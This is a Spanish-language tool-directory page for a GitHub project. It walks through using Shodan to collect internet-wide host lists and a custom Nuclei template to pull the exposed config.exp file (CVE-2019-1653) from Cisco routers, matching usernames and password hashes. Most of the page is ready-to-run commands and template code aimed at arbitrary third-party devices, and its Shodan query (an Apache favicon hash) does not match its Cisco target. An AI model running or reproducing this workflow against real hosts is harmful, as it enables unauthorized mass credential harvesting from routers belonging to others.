Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
nuclei-CiscoRV320Dump-CVE-2019-1653 — Plantilla automatizada de Nuclei y flujo de trabajo de Shodan para detectar y explotar la exposición de configuración de routers Cisco (CVE-2019-1653) para auditoría de seguridad. | Kitploit
Herramientas/GitHubGitHub/elzerjp/nuclei-ciscorv320dump-cve-2019-1653
OSINT (Inteligencia de Fuentes Abiertas)ReconocimientoEscáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de Información
GitHubelzerjp/nuclei-ciscorv320dump-cve-2019-1653

nuclei-CiscoRV320Dump-CVE-2019-1653

Plantilla automatizada de Nuclei y flujo de trabajo de Shodan para detectar y explotar la exposición de configuración de routers Cisco (CVE-2019-1653) para auditoría de seguridad.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
48hace 1 añoAún no revisado

Cisco Router Configuration Exposure Vulnerability Descripción de la Vulnerabilidad

Este repositorio detalla el proceso de explotación de una vulnerabilidad en ciertos routers Cisco que permite la exposición del archivo de configuración config.exp mediante una URL pública accesible. Este archivo puede contener información sensible, incluyendo credenciales (USERNAME y PASSWD), configuraciones de red y otros detalles críticos del sistema. En caso de estar accesible sin autenticación, puede comprometer la seguridad del dispositivo y de la red en la que está desplegado. CVE Relacionado

Esta vulnerabilidad podría relacionarse con CVE-2003-1567 y CVE-2019-1653, ambas relacionadas con la exposición no autorizada de archivos de configuración en dispositivos Cisco, aunque es importante investigar si el dispositivo y firmware específico aplican a estos CVEs. Guía Paso a Paso para la Explotación

Este procedimiento utiliza Shodan para identificar dispositivos vulnerables, seguido de Nuclei para escanear y verificar la exposición de configuraciones críticas en routers Cisco. Requisitos Previos

root@kitploit:~
Cuenta en Shodan: Asegúrate de tener una cuenta en Shodan y de que tu API Key esté configurada para acceder desde la línea de comandos.
Nuclei: Instalado en tu entorno, junto con el template personalizado de Nuclei que se describe a continuación.
Herramientas: shodan-cli, awk, y httpx para la conversión de direcciones IP a URLs completas.

Paso 1: Buscar Dispositivos Vulnerables en Shodan

El primer paso es identificar dispositivos vulnerables en Shodan mediante una búsqueda avanzada. La siguiente consulta en Shodan busca dispositivos que posiblemente sean routers Cisco:

shodan download apache_results.json.gz "http.favicon.hash:-299287097 Apache"

Este comando:

root@kitploit:~
Realiza una búsqueda en Shodan para identificar dispositivos que tengan el favicon de Apache, con un hash específico que identifica servidores que podrían estar relacionados con Apache. Esto es útil en el contexto de auditorías de servidores.

Paso 2: Descargar Resultados y Formatear URLs

Una vez que tienes el archivo apache_results.json.gz, lo siguiente es extraer IPs y puertos de cada dispositivo para formatearlos en URLs completas, incluyendo el protocolo (http o https) y el puerto. Comando para procesar los datos del archivo .json

Usa el siguiente comando para extraer las IPs y puertos y formatearlos en URLs completas en un archivo llamado urls.txt:

shodan parse --fields ip_str,port,ssl.version apache_results.json.gz |
awk '{if ($2 == 443 || $3 ~ /https/) print "https://"$1":"$2; else print "http://"$1":"$2}' > urls.txt

root@kitploit:~
shodan parse: Extrae las IPs y puertos de cada resultado en el archivo apache_results.json.gz.
awk: Formatea la salida en URLs completas, usando https si el puerto es 443 o si se detecta SSL, y http en los demás casos.

El archivo urls.txt ahora contiene URLs completas y formateadas. Paso 3: Crear un Template Personalizado de Nuclei

Para verificar si el archivo config.exp es accesible en estos dispositivos, vamos a utilizar un template personalizado de Nuclei. Este template intentará acceder al archivo y extraerá datos sensibles como USERNAME y PASSWD si están presentes. Template de Nuclei (cisco-router-config-exposure.yaml)

id: cisco-router-config-exposure info: name: Cisco Router Configuration Exposure author: elzer severity: high description: | Detecta la exposición del archivo config.exp en routers Cisco que contiene credenciales y configuraciones críticas.

tags:

  • cisco
  • router
  • vulnerability
  • cgi-bin
  • config.exp

requests:

  • method: GET path:

    • "{{BaseURL}}/cgi-bin/config.exp"

    matchers-condition: or matchers:

    • type: word words:
      • "Cisco"
      • "config"
      • "version"
    • type: regex regex:
      • "USERNAME=\w+"
      • "PASSWD=[a-f0-9]{32}"

Este template:

root@kitploit:~
Envía una solicitud GET al archivo /cgi-bin/config.exp.
Verifica si en la respuesta se encuentran palabras clave o patrones específicos (Cisco, config, version) para confirmar la exposición.
Intenta extraer valores de USERNAME y PASSWD si están presentes en el archivo.

Guarda este template como cisco-router-config-exposure.yaml en la carpeta de templates de Nuclei. Paso 4: Ejecutar Nuclei para Detectar Dispositivos Vulnerables

Con el template y el archivo urls.txt listos, ejecuta el siguiente comando de Nuclei para escanear las URLs:

nuclei -t path/to/cisco-router-config-exposure.yaml -l urls.txt -o resultados_nuclei.txt -debug -vv

root@kitploit:~
-t path/to/cisco-router-config-exposure.yaml: Indica el template personalizado que creamos.
-l urls.txt: Usa el archivo urls.txt con las URLs formateadas.
-o resultados_nuclei.txt: Guarda los resultados en el archivo resultados_nuclei.txt.
-debug -vv: Ejecuta Nuclei en modo detallado para ver el progreso y detalles de la depuración.

Resultado

Después de ejecutar Nuclei, el archivo resultados_nuclei.txt contendrá un listado de dispositivos vulnerables que exponen el archivo de configuración config.exp. Esto incluye cualquier dispositivo que devuelva credenciales o configuraciones sensibles, lo que confirma la exposición de la vulnerabilidad. Conclusión

Este proceso te permite identificar y confirmar la exposición de archivos de configuración críticos en dispositivos Cisco utilizando Shodan y Nuclei. La automatización de este flujo es especialmente útil para auditores de seguridad y profesionales de ciberseguridad interesados en identificar y remediar configuraciones inseguras en redes corporativas.

Descargar herramienta